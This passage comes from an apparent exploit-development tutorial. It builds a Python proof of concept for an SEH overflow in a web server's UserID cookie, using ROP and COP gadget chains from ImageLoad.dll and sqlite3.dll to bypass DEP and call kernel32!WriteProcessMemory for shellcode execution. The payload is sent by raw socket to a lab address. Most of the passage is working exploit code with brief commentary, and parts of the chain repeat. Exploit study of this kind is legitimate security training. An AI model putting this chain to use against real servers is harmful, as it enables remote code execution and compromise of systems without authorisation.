crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)


# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

Now that we have an updated POC, let’s use a ROP routine to subtract this value from EAX.

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)    # pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)    # Negative distance to kernel32!WriteProcessMemory

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)    # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget

The above routine will do the following:

  1. Zero out EDX
  2. Place the offset into EBX
  3. Move the offset to EDX
  4. Subtract the offset from EDX and EAX - placing the result in EAX

The negative distance between the two kernel32.dll pointers is loaded into EBX.

The distance is then loaded into EDX.

Program execution then reaches the sub eax, edx instruction.

This allows us to successfully extract kernel32!WriteProcessMemory!

Perfect! All there is left to do now is use our arbitrary write primitive to overwrite the kernel32WriteProcessMemory parameter placeholder on the stack with the actual address of kernel32!WriteProcessMemory.

If you can recall, we already decremented ECX to make it contain the address of the parameter placeholder. However, the ROP gadget we will use for our arbitrary write, does so with ECX at an offset of 0x8. To compensate for this, we will decrement ECX by 0x8 bytes. This way, when the arbitrary write gadget adds 0x8 to ECX, we will have already compensated.

crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

After we decrement ECX, we will use the arbitrary write gadget.

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the arbitrary write - and we can see we will be overwriting our parameter placeholder - as intended.

The arbitrary write occurs, and we have successfully dynamically placed our parameters on the stack!

Now that everything has been configured properly, the final goal is to kick off this function call. To do so, we will need to load the stack address which points to kernel32!WriteProcessMemory into ESP - and return into it.

Currently, after the ECX manipulation, ECX contains a stack address 0x8 bytes above the stack address we want to load into ESP (this was due to compensation for the ECX + 0x8 arbitrary write ROP gadget). This means we want to increase ECX to contain the address on the stack in question.

The goal now will be to:

  1. Set ECX equal to the stack address pointing to kernel32!WriteProcessMemory
  2. Load ECX into EAX
  3. Exchange EAX and ESP, then return into ESP

Our last ROP routine can solve this issue!

crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)    # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)    # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)

Let’s also add some breakpoints to “mimic” shellcode - directly after the xchg eax, esp ROP gadget.


# NOPs before shellcode
crash += "\x90" * 230

# Breakpoints
crash += "\xCC" * 200

Running the updated POC - we can see that the call to kernel32!WriteProcessMemory is complete - and that we have hit our breakpoints!

Here is the final PoC, with calc.exe shellcode.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP gadget which moves EAX into EAX via "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)    # Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
